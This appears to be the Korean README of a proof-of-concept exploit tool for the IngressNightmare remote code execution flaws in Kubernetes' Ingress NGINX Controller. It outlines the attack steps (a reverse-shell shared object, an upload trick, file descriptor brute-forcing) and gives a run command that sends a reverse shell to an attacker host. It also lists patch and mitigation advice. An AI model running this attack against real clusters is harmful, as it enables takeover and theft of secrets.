
이것은 IngressNightmare 취약점(CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 및 CVE-2025-1974)을 악용하기 위한 PoC 코드입니다.
이 프로젝트는 Kubernetes의 Ingress NGINX Controller에서 발견된 인증되지 않은 원격 코드 실행(RCE) 취약점을 대상으로 하는 익스플로잇을 제공하며, 이 취약점들은 IngressNightmare로 통칭됩니다. (연구: Wiz)
원본 연구에서 Wiz 팀은 PoC나 실제 익스플로잇을 제공하지 않았기 때문에, 우리는 자체적으로 제작하여 커뮤니티와 공유하기로 결정했습니다.
Ingress NGINX Controller는 Kubernetes 환경에서 널리 사용되는 구성 요소로, 클러스터 내 서비스에 대한 외부 액세스를 관리합니다. 최근 admission controller에서 발견된 취약점(CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974)은 네임스페이스 전체의 모든 시크릿에 대한 무단 액세스를 유발하고 잠재적으로 클러스터 전체를 장악할 수 있습니다.
https://github.com/user-attachments/assets/9e893abf-5c01-4fcb-ad79-7115b429281f
익스플로잇은 다음 주요 단계를 따릅니다:
공유 객체 생성 (주입된 ssl_engine 속성에 사용됨):
리버스 셸 페이로드를 포함하는 .so 라이브러리(evil_engine.so)를 컴파일합니다.
공유 객체 업로드:
컴파일된 공유 객체를 요청 처리(client body buffers)를 이용해 ingress 파드로 전송합니다. 여기서 핵심은 서버에 다른 Content-Length를 전송하여 연결을 유지하고 파일을 열린 상태로 유지하는 파일 디스크립터를 유지하는 것입니다.
파일 디스크립터 브루트포스: 프로세스 ID와 파일 디스크립터(/proc/{pid}/fd/{fd})를 반복하여 업로드된 객체를 참조하는 올바른 디스크립터를 식별합니다.
필수 조건: Python 3.x GCC 컴파일러 Python requests 모듈
익스플로잇 실행:
pip3 install -r requirements.txt
python3 exploit.py <ingress_url> <admission_webhook_url> [attacker_host:port](https://github.com/hakaioffsec/ingressnightmare-poc/blob/HEAD/attacker_host:port)
예시: python3 xpl.py http://192.168.0.154 https://rke2-ingress-nginx-controller-admission.kube-system 192.168.1.63:443
때로는 admission webhook이 다른 네임스페이스에 있을 수 있습니다. 이 경우 마지막에 kube-system, default, ingress-nginx와 같은 네임스페이스를 지정해야 합니다.
<ingress_url>: 대상 Ingress URL (공개)
<admission_webhook_url>: Admission webhook URL (내부 웹훅)
attacker_host:port: 리버스 셸을 위한 호스트와 포트
즉시 업데이트: Ingress NGINX Controller를 패치 버전(1.12.1 또는 1.11.5)으로 업그레이드하세요.
Admission webhook 제한: 웹훅에 대한 액세스를 Kubernetes API 서버로만 제한하세요.
임시 비활성화: 업그레이드가 즉시 불가능한 경우 admission controller 구성 요소를 임시로 비활성화하는 것을 고려하세요.
QuimeraX Intelligence는 복잡한 시스템의 심각한 취약점을 식별하는 데 특화된 고급 EASM 및 사이버 위협 인텔리전스 플랫폼입니다. 이 플랫폼은 보안 위협에 대해 사전 예방적으로 모니터링, 탐지 및 경고하여 투명성과 잠재적 위험에 대한 신속한 대응을 보장합니다. 고객은 시스템이 취약한 것으로 발견되면 즉시 알림과 포괄적인 보고서를 받아 보호 조치를 취할 수 있습니다. 자세히 알아보기
Hakai Security는 보안 전문가들이 설립한 사이버 보안 회사로, 기술적 우수성에 전념하고 있습니다. 우리는 진화하는 사이버 위협으로부터 고객의 자산을 사전에 보호하기 위해 고급 침투 테스트, 현실적인 Red Team 시뮬레이션, 안전한 개발 관행을 포함한 맞춤형 보안 솔루션을 제공합니다. 자세히 알아보기
면책 조항
이 익스플로잇은 교육 및 연구 목적으로만 제공됩니다. 명시적 허가 없이 이 도구를 대상에 대해 무단 사용하는 것은 금지됩니다. Hakai Security와 QuimeraX는 이 익스플로잇 사용으로 인한 오용이나 손해에 대해 책임을 지지 않습니다.